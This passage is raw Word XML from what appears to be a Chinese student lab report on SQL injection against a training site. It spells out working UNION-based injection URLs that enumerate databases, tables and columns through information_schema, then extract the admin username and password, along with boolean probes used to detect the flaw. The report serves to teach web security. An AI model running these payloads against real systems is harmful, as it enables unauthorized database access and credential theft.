            </w:r>
            <w:r w:rsidR="00E23C91">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>group</w:t>
            </w:r>
            <w:r w:rsidR="00E23C91">
              <w:t>_contact(&lt;col&gt;)</w:t>
            </w:r>
            <w:r w:rsidR="00EB239E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>函数</w:t>
            </w:r>
            <w:r w:rsidR="00BE176C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，直接获取所有表</w:t>
            </w:r>
            <w:r w:rsidR="005D7C00">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的名称</w:t>
            </w:r>
            <w:r w:rsidR="003C058F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的总和</w:t>
            </w:r>
            <w:r w:rsidR="00391550">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63C7FF9D" w14:textId="1C5189BB" w:rsidR="00DA7340" w:rsidRDefault="00DA7340" w:rsidP="001066F5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1)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>获取</w:t>
            </w:r>
            <w:r w:rsidR="0021258D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所有数据库中的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所有表</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EFC752B" w14:textId="3DD13485" w:rsidR="003C058F" w:rsidRDefault="00F03E45" w:rsidP="001066F5">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F03E45">
              <w:t>http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union SELECT table_schema, GROUP_CONCAT( table_name ) from information_schema.tables</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C850A4F" w14:textId="7F881B84" w:rsidR="005135A6" w:rsidRDefault="0021258D" w:rsidP="001066F5">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0021258D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="0021258D">
              <w:t>)获取</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>当前所在</w:t>
            </w:r>
            <w:r w:rsidRPr="0021258D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据库中的</w:t>
            </w:r>
            <w:r w:rsidRPr="0021258D">
              <w:t>所有表</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23949F1A" w14:textId="6CD0AC06" w:rsidR="00692EFD" w:rsidRDefault="00692EFD" w:rsidP="001066F5">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>其中m</w:t>
            </w:r>
            <w:r>
              <w:t>aoshe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>为</w:t>
            </w:r>
            <w:r w:rsidR="00FD665F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>第四步获取的内容</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58793ACA" w14:textId="22A3691E" w:rsidR="00391550" w:rsidRDefault="0021258D" w:rsidP="001066F5">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0021258D">
              <w:t>http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union SELECT table_schema, GROUP_CONCAT( table_name ) from information_schema.tables</w:t>
            </w:r>
            <w:r w:rsidR="00BC069F">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00BC069F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>where</w:t>
            </w:r>
            <w:r w:rsidR="00BC069F">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00D36A3A" w:rsidRPr="00D36A3A">
              <w:t>table_schema='maoshe'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CDB16E1" w14:textId="77777777" w:rsidR="0021258D" w:rsidRPr="0021258D" w:rsidRDefault="0021258D" w:rsidP="001066F5">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="03254799" w14:textId="1B4FF657" w:rsidR="00971D8E" w:rsidRPr="00C55295" w:rsidRDefault="005A0201" w:rsidP="001066F5">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C55295">
              <w:rPr>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00971D8E" w:rsidRPr="00C55295">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidR="00635109" w:rsidRPr="00C55295">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>获取</w:t>
            </w:r>
            <w:r w:rsidR="007A4ABF" w:rsidRPr="00C55295">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>每个表中的字段数量以及字段名</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65AA1D02" w14:textId="1C82E18A" w:rsidR="00C55295" w:rsidRDefault="000D7AA8" w:rsidP="001066F5">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>利用</w:t>
            </w:r>
            <w:r w:rsidR="0043594C" w:rsidRPr="0043594C">
              <w:t>information_schema.columns</w:t>
            </w:r>
            <w:r w:rsidR="007608EC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>表，</w:t>
            </w:r>
            <w:r w:rsidR="00620B87">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>这里仅以</w:t>
            </w:r>
            <w:r w:rsidR="002768FF">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>m</w:t>
            </w:r>
            <w:r w:rsidR="002768FF">
              <w:t>aoshe</w:t>
            </w:r>
            <w:r w:rsidR="002768FF">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中的</w:t>
            </w:r>
            <w:r w:rsidR="0009128A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
            <w:r w:rsidR="00957A31">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>表为列，其他表同理，不做赘述</w:t>
            </w:r>
            <w:r w:rsidR="00803CB6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B6EFF8B" w14:textId="2F89A27C" w:rsidR="00803CB6" w:rsidRDefault="00631DE1" w:rsidP="001066F5">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00631DE1">
              <w:t>http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select table_name,group_concat(column_name) from information_schema.columns where table_schema='maoshe' and table_name='admin'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62D7A720" w14:textId="77777777" w:rsidR="00D54174" w:rsidRDefault="00D54174" w:rsidP="001066F5">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="73A33003" w14:textId="77777777" w:rsidR="00B76417" w:rsidRPr="00C55295" w:rsidRDefault="005A0201" w:rsidP="001066F5">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C55295">
              <w:rPr>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="0033410F" w:rsidRPr="00C55295">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidR="002F1323" w:rsidRPr="00C55295">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>获取</w:t>
            </w:r>
            <w:r w:rsidR="000F131D" w:rsidRPr="00C55295">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>管理员用户密码</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69EC881E" w14:textId="77777777" w:rsidR="00C55295" w:rsidRDefault="00CC4BEF" w:rsidP="001066F5">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>根据第六步获取的列可以发现</w:t>
            </w:r>
            <w:r w:rsidR="00E23BE5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，admin</w:t>
            </w:r>
            <w:r w:rsidR="00F97446">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>表中由I</w:t>
            </w:r>
            <w:r w:rsidR="00F97446">
              <w:t>d,username,password</w:t>
            </w:r>
            <w:r w:rsidR="00F97446">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>三个数据</w:t>
            </w:r>
            <w:r w:rsidR="00E96F7D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。故直接获取</w:t>
            </w:r>
            <w:r w:rsidR="006941A1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>I</w:t>
            </w:r>
            <w:r w:rsidR="006941A1">
              <w:t>d=1</w:t>
            </w:r>
            <w:r w:rsidR="006941A1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对应的p</w:t>
            </w:r>
            <w:r w:rsidR="006941A1">
              <w:t>assword</w:t>
            </w:r>
            <w:r w:rsidR="006941A1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>即可。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="500DB087" w14:textId="6C6CD301" w:rsidR="002A4975" w:rsidRDefault="001D622B" w:rsidP="001066F5">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>用户名：</w:t>
            </w:r>
            <w:r w:rsidR="002A4975" w:rsidRPr="002A4975">
              <w:t>http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,username from maoshe.admin where id=1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11325408" w14:textId="6CFB8195" w:rsidR="001D622B" w:rsidRDefault="001D622B" w:rsidP="001066F5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用户密码：</w:t>
            </w:r>
            <w:r w:rsidRPr="001D622B">
              <w:t>http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,</w:t>
            </w:r>
            <w:r w:rsidR="006A198E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>pass</w:t>
            </w:r>
            <w:r w:rsidR="006A198E">
              <w:t>word</w:t>
            </w:r>
            <w:r w:rsidR="0058797B">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001D622B">
              <w:t>from maoshe.admin where id=1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00443E3E" w14:paraId="62C73E34" w14:textId="77777777" w:rsidTr="001F5C55">
        <w:trPr>
          <w:trHeight w:val="1907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66645A8" w14:textId="77777777" w:rsidR="00443E3E" w:rsidRDefault="00443E3E" w:rsidP="00443E3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五、实验过程</w:t>
            </w:r>
            <w:r w:rsidR="00DF2E70">
              <w:rPr>
                <w:rFonts w:eastAsia="黑体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>中</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="黑体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>遇到的问题</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="黑体"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>及解决</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="黑体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>情况</w:t>
            </w:r>
            <w:r w:rsidR="00DF2E70" w:rsidRPr="00DF2E70">
              <w:rPr>
                <w:rFonts w:eastAsia="黑体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="00DF2E70" w:rsidRPr="00DF2E70">
              <w:rPr>
                <w:rFonts w:eastAsia="黑体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>主要</w:t>
            </w:r>
            <w:r w:rsidR="00DF2E70" w:rsidRPr="00DF2E70">
              <w:rPr>
                <w:rFonts w:eastAsia="黑体"/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>问题及解决情况</w:t>
            </w:r>
            <w:r w:rsidR="00DF2E70" w:rsidRPr="00DF2E70">
              <w:rPr>
                <w:rFonts w:eastAsia="黑体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C8B26C8" w14:textId="5DC09F11" w:rsidR="00443E3E" w:rsidRDefault="00D618E4" w:rsidP="00D618E4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 w:rsidR="003B3278">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidR="00265A83">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在获取</w:t>
            </w:r>
            <w:r w:rsidR="009C706C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据库中所有表时，</w:t>
            </w:r>
            <w:r w:rsidR="00961A31">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>当使用常规</w:t>
            </w:r>
            <w:r w:rsidR="00743C52">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的s</w:t>
            </w:r>
            <w:r w:rsidR="00743C52">
              <w:t>elect</w:t>
            </w:r>
            <w:r w:rsidR="00743C52">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>方法</w:t>
            </w:r>
            <w:r w:rsidR="002F41AA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，由于只显示第一行第2列位置的数据，导致只能一个一个获取数据</w:t>
            </w:r>
            <w:r w:rsidR="00AC61CD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，具体结果如下</w:t>
            </w:r>
            <w:r w:rsidR="006A0151">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。如何才能快速的一次性取出所有数据呢？</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04472446" w14:textId="77777777" w:rsidR="00443E3E" w:rsidRDefault="0016004C" w:rsidP="0016004C">
            <w:pPr>
              <w:pStyle w:val="a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BD56EB2" wp14:editId="3444B201">
                  <wp:extent cx="4871085" cy="1749425"/>
                  <wp:effectExtent l="38100" t="38100" r="81915" b="793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74942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C1F90F8" w14:textId="33D40CD4" w:rsidR="008F5D1E" w:rsidRDefault="008F5D1E" w:rsidP="0016004C">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>经过查阅资料，发现g</w:t>
            </w:r>
            <w:r>
              <w:t>roup_concat</w:t>
            </w:r>
            <w:r w:rsidR="001D66A9">
              <w:t>(&lt;col&gt;)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可以聚合</w:t>
            </w:r>
            <w:r w:rsidR="001D66A9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>选中</w:t>
            </w:r>
            <w:r w:rsidR="00FC63BE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>列</w:t>
            </w:r>
            <w:r w:rsidR="00A07E6E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所有</w:t>
            </w:r>
            <w:r w:rsidR="00180E97">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的数据，并以</w:t>
            </w:r>
            <w:r w:rsidR="00180E97">
              <w:t>”,”</w:t>
            </w:r>
            <w:r w:rsidR="00180E97">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>分隔。（当然可以自定义分隔符号，</w:t>
            </w:r>
            <w:r w:rsidR="00C353F4">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如g</w:t>
            </w:r>
            <w:r w:rsidR="00C353F4">
              <w:t>roup_concat(col,\)</w:t>
            </w:r>
            <w:r w:rsidR="00180E97">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
            <w:r w:rsidR="009043D0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。得到结果如下</w:t>
            </w:r>
            <w:r w:rsidR="0047132C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。其中r</w:t>
            </w:r>
            <w:r w:rsidR="0047132C">
              <w:t>aw</w:t>
            </w:r>
            <w:r w:rsidR="0047132C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>内容即为上一张图p</w:t>
            </w:r>
            <w:r w:rsidR="0047132C">
              <w:t>review</w:t>
            </w:r>
            <w:r w:rsidR="0047132C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中显示的内容，完美且高效的解决！</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="715B9DF2" w14:textId="7111B4C5" w:rsidR="009043D0" w:rsidRPr="00DF2E70" w:rsidRDefault="00FC4B7A" w:rsidP="0016004C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50E74C" wp14:editId="7737E9E7">
                  <wp:extent cx="4871085" cy="1938655"/>
                  <wp:effectExtent l="38100" t="38100" r="81915" b="806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93865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B21" w14:paraId="42139B16" w14:textId="77777777" w:rsidTr="00973DC7">
        <w:trPr>
          <w:trHeight w:val="5530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0AA434F" w14:textId="77777777" w:rsidR="00125B21" w:rsidRDefault="00443E3E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六</w:t>
            </w:r>
            <w:r w:rsidR="00125B21">
              <w:rPr>
                <w:rFonts w:eastAsia="黑体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>、实验结果及分析和（或）源程序调试过程</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D118A8C" w14:textId="749174A3" w:rsidR="00A22455" w:rsidRDefault="00A22455" w:rsidP="00A22455">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A22455">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00A22455">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="00A22455">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>判断网站是</w:t>
            </w:r>
            <w:r w:rsidRPr="00A22455">
              <w:rPr>
                <w:rFonts w:hint="cs"/>
                <w:b/>
              </w:rPr>
              <w:t>否存在注入漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B3494B8" w14:textId="34228908" w:rsidR="00747536" w:rsidRPr="00A22455" w:rsidRDefault="00747536" w:rsidP="00747536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页面无显示，存在漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EE4EF2F" w14:textId="1C72F650" w:rsidR="003D1456" w:rsidRPr="00A22455" w:rsidRDefault="00747536" w:rsidP="00747536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6009E6" wp14:editId="070D9501">
                  <wp:extent cx="4871085" cy="1099185"/>
                  <wp:effectExtent l="38100" t="38100" r="81915" b="819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09918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44C417F" w14:textId="298FAC81" w:rsidR="00747536" w:rsidRDefault="00747536" w:rsidP="00747536">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00747536">
              <w:t>2、</w:t>
            </w:r>
            <w:r w:rsidRPr="00747536">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>存在何种漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07D99A39" w14:textId="2258FCEF" w:rsidR="00747536" w:rsidRPr="00747536" w:rsidRDefault="0097504A" w:rsidP="00747536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结果如下，可知存在数值漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BBB6F8B" w14:textId="77777777" w:rsidR="00747536" w:rsidRPr="00747536" w:rsidRDefault="00747536" w:rsidP="00747536">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="1140"/>
              </w:tabs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 w:rsidRPr="00747536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(1)</w:t>
            </w:r>
            <w:hyperlink r:id="rId13" w:history="1">
              <w:r w:rsidRPr="00747536">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                  <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                  <w:bCs/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>http://rhiq8003.ia.aqlab.cn/?id=1</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00747536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 xml:space="preserve"> and 1=1，页面正常显示</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10B315A5" w14:textId="77777777" w:rsidR="00747536" w:rsidRPr="00747536" w:rsidRDefault="00747536" w:rsidP="00747536">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="1140"/>
              </w:tabs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 w:rsidRPr="00747536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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52CA61EE" wp14:editId="24A8B81D">
                  <wp:extent cx="4592596" cy="1790700"/>
                  <wp:effectExtent l="38100" t="38100" r="74930" b="7620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868" cy="180055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1520F04" w14:textId="77777777" w:rsidR="00747536" w:rsidRPr="00747536" w:rsidRDefault="00747536" w:rsidP="00747536">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="1140"/>
              </w:tabs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 w:rsidRPr="00747536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(</w:t>
            </w:r>
            <w:r w:rsidRPr="00747536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2) http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2, 页面无显示</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0416EF83" w14:textId="77777777" w:rsidR="00747536" w:rsidRPr="00747536" w:rsidRDefault="00747536" w:rsidP="00747536">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="1140"/>
              </w:tabs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 w:rsidRPr="00747536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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79EA4C19" wp14:editId="2A854640">
                  <wp:extent cx="4871085" cy="1872615"/>
                  <wp:effectExtent l="38100" t="38100" r="81915" b="704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87261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EEF2D02" w14:textId="77777777" w:rsidR="00747536" w:rsidRPr="00747536" w:rsidRDefault="00747536" w:rsidP="00747536">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="1140"/>
              </w:tabs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 w:rsidRPr="00747536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(</w:t>
            </w:r>
            <w:r w:rsidRPr="00747536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3) http://rhiq8003.ia.aqlab.cn/?id=1’ and '1'='1,页面无显示</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="389E9D50" w14:textId="77777777" w:rsidR="00747536" w:rsidRPr="00747536" w:rsidRDefault="00747536" w:rsidP="00747536">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="1140"/>
              </w:tabs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 w:rsidRPr="00747536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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="511D8DEC" wp14:editId="1D45951B">
                  <wp:extent cx="4871085" cy="1924050"/>
                  <wp:effectExtent l="38100" t="38100" r="81915" b="7620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9240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805DC02" w14:textId="77777777" w:rsidR="00747536" w:rsidRPr="00747536" w:rsidRDefault="00747536" w:rsidP="00747536">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="1140"/>
              </w:tabs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 w:rsidRPr="00747536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(</w:t>
            </w:r>
            <w:r w:rsidRPr="00747536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4)</w:t>
            </w:r>
            <w:hyperlink r:id="rId17" w:history="1">
              <w:r w:rsidRPr="00747536">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                  <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                  <w:bCs/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>http://rhiq8003.ia.aqlab.cn/?id=1</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00747536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’ and '1'='2,页面无显示</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53D5F950" w14:textId="77777777" w:rsidR="00747536" w:rsidRPr="00747536" w:rsidRDefault="00747536" w:rsidP="00747536">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="1140"/>
              </w:tabs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 w:rsidRPr="00747536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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58A4A2FF" wp14:editId="2D53CB19">
                  <wp:extent cx="4871085" cy="1809115"/>
                  <wp:effectExtent l="38100" t="38100" r="81915" b="768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80911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397BFA0" w14:textId="7CEB4206" w:rsidR="005A0201" w:rsidRDefault="005A0201" w:rsidP="005A0201">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0201">
              <w:rPr>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>3、</w:t>
            </w:r>
            <w:r w:rsidRPr="005A0201">
              <w:rPr>
